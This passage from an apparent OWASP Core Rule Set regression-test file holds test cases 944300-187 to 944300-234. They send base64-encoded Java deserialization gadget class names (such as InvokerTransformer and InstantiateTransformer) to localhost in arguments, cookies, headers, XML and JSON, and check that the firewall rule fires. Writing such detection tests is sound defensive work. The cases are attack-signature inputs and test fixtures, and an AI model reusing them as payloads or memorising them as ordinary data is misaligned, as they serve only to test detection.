agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-187 + desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-188 + desc: "Argument test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-189 + desc: "Argument name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-190 + desc: "Cookie test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-191 + desc: "Cookie name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-192 + desc: "Request header test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-193 + desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-194 + desc: "XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-195 + desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-196 + desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-197 + desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-198 + desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-199 + desc: "Argument test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-200 + desc: "Argument name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-201 + desc: "Cookie test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-202 + desc: "Cookie name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-203 + desc: "Request header test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-204 + desc: "XML attribute value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-205 + desc: "XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-206 + desc: "Nested XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-207 + desc: "Content-Type text/plain includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-208 + desc: "Content-Type application/json arg value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-209 + desc: "Content-Type application/json arg name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-210 + desc: "Argument test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-211 + desc: "Argument name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-212 + desc: "Cookie test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-213 + desc: "Cookie name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-214 + desc: "Request header test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-215 + desc: "XML attribute value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-216 + desc: "XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-217 + desc: "Nested XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-218 + desc: "Content-Type text/plain includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-219 + desc: "Content-Type application/json arg value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-220 + desc: "Content-Type application/json arg name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-221 + desc: "Argument test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-222 + desc: "Argument name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-223 + desc: "Cookie test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-224 + desc: "Cookie name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-225 + desc: "Request header test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-226 + desc: "XML attribute value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-227 + desc: "XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-228 + desc: "Nested XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-229 + desc: "Content-Type text/plain includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-230 + desc: "Content-Type application/json arg value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-231 + desc: "Content-Type application/json arg name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-232 + desc: "Argument test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-233 + desc: "Argument name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-234 + desc: "Cookie test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 